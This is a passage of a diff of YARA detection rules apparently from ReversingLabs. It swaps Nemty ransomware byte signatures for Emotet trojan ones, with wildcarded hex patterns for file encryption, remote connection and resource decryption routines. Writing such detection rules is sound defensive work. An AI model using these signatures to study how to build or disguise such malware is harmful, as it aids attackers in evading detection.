?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 - } - $find_files_p3 = { - 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 - ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 81 7D ?? ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? FF 75 ?? 8B 5D - ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 - ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 - DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 - 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 - ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? - BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ?? - 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? A1 ?? ?? ?? ?? 50 - FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? - 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D - ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 - ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 68 - } - $find_files_p4 = { - FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? - ?? FF 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? - 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? - ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? - ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? B8 - ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? FF 75 ?? B9 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 - C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? - 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? - ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 - E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? - ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? - ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? - ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 - } - $find_files_p5 = { - 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? - ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? - 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 - E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? - 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? - 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ?? - ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? - 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 - 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D - 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 - ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 - E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 - DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 + $entry_setup = { + 58 (68 | 8B) [6-8] 59 [1-3] E2 ?? 57 8B (C7 | EC) 8B (C7 | EC) 05 ?? ?? ?? ?? 68 [4-5] + 89 45 [1-2] 8B D7 [3-4] 8B C1 66 AD 85 C0 74 ?? 3B (C1 | C8) (72 | 77) ?? 2B C1 (C1 | D1) + [2-4] 8B CF 03 C8 81 C1 ?? ?? ?? ?? 8B 01 59 03 D0 52 EB ?? 89 45 ?? 8B C5 B9 ?? ?? + ?? ?? C1 E1 ?? 2B C1 8B 00 89 45 ?? 6A ?? 8B D0 59 FF D2 89 68 ?? 6A ?? 8B D0 FF D2 } - $encrypt_files_p1 = { - B8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 - E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? - B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? - ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? - 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? - 83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? - ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? - 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 - C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 - 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? - ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D + $decrypt_function_snippet = { + 58 8B C8 75 ?? 58 2B F0 50 8B D8 49 75 ?? 59 58 59 5E 5F 5B C3 } - $encrypt_files_p2 = { - 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? - ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 - ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? - 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D - ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? - ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 + $decrypt_function_snippet_wrapper = { + 55 BD ?? ?? ?? ?? 50 51 52 6A ?? FF 45 ?? 8B 45 ?? 59 F7 E1 8D 8D ?? ?? ?? ?? 03 C8 + 89 4D ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 01 89 79 ?? 89 71 ?? 8B D1 59 89 4A + ?? 55 2B C0 8B C8 8B 02 8B F8 58 41 41 41 41 50 2B C1 8B 00 3B C7 72 ?? 58 C1 E9 ?? + 49 89 4A ?? E3 ?? FF 55 ?? 8B 55 ?? 8B 4A ?? FF 55 ?? 50 51 50 6A ?? 59 FF 55 ?? FF + D0 } condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and $entry_setup and ($decrypt_function_snippet or $decrypt_function_snippet_wrapper) } -rule REVERSINGLABS_Win32_Ransomware_Nemty : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Trojan_Emotet : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Nemty ransomware." + description = "Yara rule that detects Emotet trojan." author = "ReversingLabs" - id = "c56ecd32-5903-5bcc-aa69-a070f2c247c4" - date = "2020-07-15" - modified = "2020-07-15" + id = "9742743d-753a-582b-9701-7278c8ed0e4e" + date = "2021-11-16" + modified = "2021-11-16" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Nemty.yara#L1-L205" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dc8cfdcdea8ecb2018b1b04bb1b645f6dbdc6c07357719100677c75945edef40" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/trojan/Win32.Trojan.Emotet.yara#L1-L182" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "747d603c9849a66782c95050a4a634ffdb4ce2882adcfc5d63e1f1ea1651b25e" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Nemty" + tc_detection_type = "Trojan" + tc_detection_name = "Emotet" tc_detection_factor = 5 importance = 25 strings: - $remote_connection_p1 = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 8D 75 - ?? 89 5D ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 - 53 53 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 6A - ?? 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? - ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 53 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? - ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 32 DB EB ?? B3 ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? - 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? - ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 8B 1D ?? ?? ?? ?? - 50 FF D3 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 - 72 ?? 8B 00 50 FF D3 33 DB 43 53 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? - E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 59 59 FF 75 ?? FF + $decrypt_resource_v1 = { + 55 8B EC 83 EC ?? 53 8B D9 8B C2 56 57 89 45 ?? 8B 3B 33 F8 8B C7 89 7D ?? 83 E0 ?? + 75 ?? 8D 77 ?? EB ?? 8B F7 2B F0 83 C6 ?? 8D 0C 36 E8 ?? ?? ?? ?? 8B D0 89 55 ?? 85 + D2 74 ?? 83 65 ?? ?? 8D 43 ?? 83 65 ?? ?? C1 EE ?? 8D 0C B0 8B F2 8B D9 2B D8 83 C3 + ?? C1 EB ?? 3B C1 0F 47 5D ?? 85 DB 74 ?? 8B 55 ?? 8B F8 8B 0F 8D 7F ?? 33 CA 0F B6 + C1 66 89 06 8B C1 C1 E8 ?? 8D 76 ?? 0F B6 C0 66 89 46 ?? C1 E9 ?? 0F B6 C1 66 89 46 + ?? C1 E9 ?? 0F B6 C1 66 89 46 ?? 8B 45 ?? 40 89 45 ?? 3B C3 72 ?? 8B 7D ?? 8B 55 ?? + 33 C0 66 89 04 7A 5F 5E 8B C2 5B 8B E5 5D C3 } - $remote_connection_p2 = { - D6 FF 75 ?? FF D6 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? - 83 78 ?? ?? 59 59 72 ?? 8B 00 50 FF 15 ?? ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ?? - 53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? - ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 C9 51 51 51 50 68 ?? ?? ?? ?? 51 FF 15 ?? - ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 5A 8B C1 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 39 55 ?? - 73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ?? - 8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 - 3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D - ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 83 EC ?? 8D 45 ?? 8B F4 50 E8 ?? ?? - ?? ?? 83 EC ?? 8B F4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 33 - FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + $generate_filename_v1 = { + 56 57 33 C0 BF ?? ?? ?? ?? 57 50 50 6A ?? 50 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8B F0 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? + ?? 83 C4 ?? 8B CE 5F 5E E9 } - $enum_resources_p1 = { - 55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 53 56 57 FF 15 ?? ?? ?? - ?? 83 64 24 ?? ?? 89 44 24 ?? BB ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? D3 EA 33 C0 40 - 23 D0 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? 80 C1 ?? 5F 88 4C 24 ?? FF 74 24 ?? 8D - 74 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 64 24 ?? ?? 8B 74 24 ?? 53 89 - 7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 59 03 C6 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D - 44 24 ?? 50 83 C8 ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8B C6 - E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8B C6 50 FF 15 ?? ?? ?? ?? 6A ?? 33 - FF 8D 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 - 8B F8 53 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? - 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 - 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 + $decrypt_resource_v2 = { + 55 8B EC 83 EC ?? 8B 41 ?? 8B 11 33 C2 53 56 8D 71 ?? 89 55 ?? 8D 58 ?? 89 45 ?? 83 + C6 ?? F6 C3 ?? 74 ?? 83 E3 ?? 83 C3 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? + 8B C8 E8 ?? ?? ?? ?? FF D0 8D 14 1B B9 ?? ?? ?? ?? 52 6A ?? 50 E8 ?? ?? ?? ?? BA ?? + ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? FF D0 89 45 ?? 85 C0 74 ?? C1 EB ?? 8B C8 57 33 C0 8D + 14 9E 33 DB 8B FA 2B FE 83 C7 ?? C1 EF ?? 3B F2 0F 47 F8 85 FF 74 ?? 8B 16 8D 49 ?? + 33 55 ?? 8D 76 ?? 0F B6 C2 43 66 89 41 ?? 8B C2 C1 E8 ?? 0F B6 C0 66 89 41 ?? C1 EA + ?? 0F B6 C2 66 89 41 ?? C1 EA ?? 0F B6 C2 66 89 41 ?? 3B DF 72 ?? 8B 45 ?? 33 D2 8B + 4D ?? 5F 66 89 14 41 8B C1 5E 5B 8B E5 5D C3 } - $enum_resources_p2 = { - 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D - 74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8D 44 24 - ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 - ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? - E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 ?? 6A ?? 8D 4C 24 ?? 51 8D - 4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ?? 89 44 24 ?? 8D - 44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ?? - 89 44 24 ?? 8D 44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 2B 44 24 - ?? 8B 4C 24 ?? 1B 4C 24 ?? BE ?? ?? ?? ?? 0F AC C8 ?? 89 44 24 ?? 8D 44 24 ?? C1 E9 - ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? FF 44 24 ?? 83 7C 24 ?? ?? - 0F 8C ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 + $generate_filename_v2 = { + 55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 51 6A ?? B9 ?? ?? ?? ?? + E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? FF D0 85 C0 0F 88 ?? ?? ?? ?? 56 + B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 8D [1-5] 51 + 51 50 56 8D [1-5] 68 ?? ?? ?? ?? 51 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B + C8 E8 ?? ?? ?? ?? FF D0 83 C4 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 + E8 ?? ?? ?? ?? FF D0 56 6A ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 + E8 ?? ?? ?? ?? FF D0 B8 ?? ?? ?? ?? 5E 8B E5 5D C3 33 C0 8B E5 5D C3 } - $find_files_1_p1 = { - 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 - 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? - E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? - 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D - 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? - ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 + $decrypt_resource_v3 = { + 56 8B F1 BA [6-9] B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF D0 56 6A ?? 50 68 ?? ?? ?? ?? + BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF D0 5E C3 } - $find_files_1_p2 = { - C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 - ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? - ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F - 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? - ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? - ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? - ?? ?? 59 84 C0 75 ?? 83 EC 